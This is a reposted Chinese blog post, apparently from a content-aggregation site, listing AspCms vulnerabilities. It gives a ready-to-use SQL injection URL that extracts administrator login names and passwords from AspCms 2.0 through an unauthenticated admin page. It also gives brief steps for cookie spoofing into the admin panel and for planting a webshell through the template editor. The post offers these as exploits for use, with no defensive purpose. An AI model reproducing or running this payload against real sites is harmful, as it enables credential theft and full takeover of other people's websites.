aspcms各版本漏洞0day集合
生活随笔
收集整理的這篇文章主要介紹了
aspcms各版本漏洞0day集合
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
admin/_content/_About/AspCms_AboutEdit.asp?id=19?and?1=2?union?select?1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24?from?aspcms_user?where?userid=1
————————————————————————
Powered by AspCms2.0
未驗(yàn)證權(quán)限,且存在注入漏洞
admin/_content/_About/AspCms_AboutEdit.asp?id=19
表名:aspcms_user
列名:loginname、password
利用EXP:
2.0漏洞測試人:逍遙復(fù)仇(請注明)
——————Cookies欺騙——————
逍遙復(fù)仇碰到一個(gè)站后臺(tái)被管理員改了,NND。后臺(tái)主頁半天沒有找到,最后去官方down源碼查看是home.asp(版本不同如不對請?jiān)噈ain.asp),工具為:Cookie & Inject Browser
——————webshell獲取——————
所有版本存在后臺(tái)編輯風(fēng)格 可以修改任意文件,獲取webshell就很簡單了
轉(zhuǎn)載于:https://blog.51cto.com/0daysec/1571383
總結(jié)
以上是生活随笔為你收集整理的aspcms各版本漏洞0day集合的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 字符串分离函数
- 下一篇: javascript 异常基本语法